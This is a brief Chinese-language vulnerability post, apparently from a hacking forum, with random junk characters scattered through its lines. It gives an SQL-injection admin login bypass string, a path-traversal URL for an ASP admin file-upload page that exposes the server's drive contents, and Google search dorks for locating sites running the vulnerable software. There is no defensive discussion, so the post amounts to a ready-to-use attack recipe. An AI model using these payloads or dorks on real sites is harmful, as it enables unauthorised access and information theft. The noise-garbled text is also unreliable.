后台万能密码 'or'='or'% u/ z' S* J a: ~7 m; f
) P. e$ M+ B$ o% J% E, N4 C) Q6 h
后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!5 M, o1 ^! \9 i ?8 ~9 ~
admin/uploadfile.asp?currentFolder=/upfiles/../
" B' {& E; {' ]2 m$ l6 d* o
: P$ j6 Y5 \0 h; p1 g3 }; F. ]! j: `漏洞证明:, G+ u6 l* r1 G1 i
# p- ~1 w& D; w/ D8 ~% s, i1 A
谷歌:inurl:type.asp?id=1 新闻中心
6 `$ ^3 u* M3 _3 M' U5 b* P或者 :inurl:download_ok.asp?
2 s4 S# w, R; ^& t, I
4 t' T l# d, g3 M* G8 s |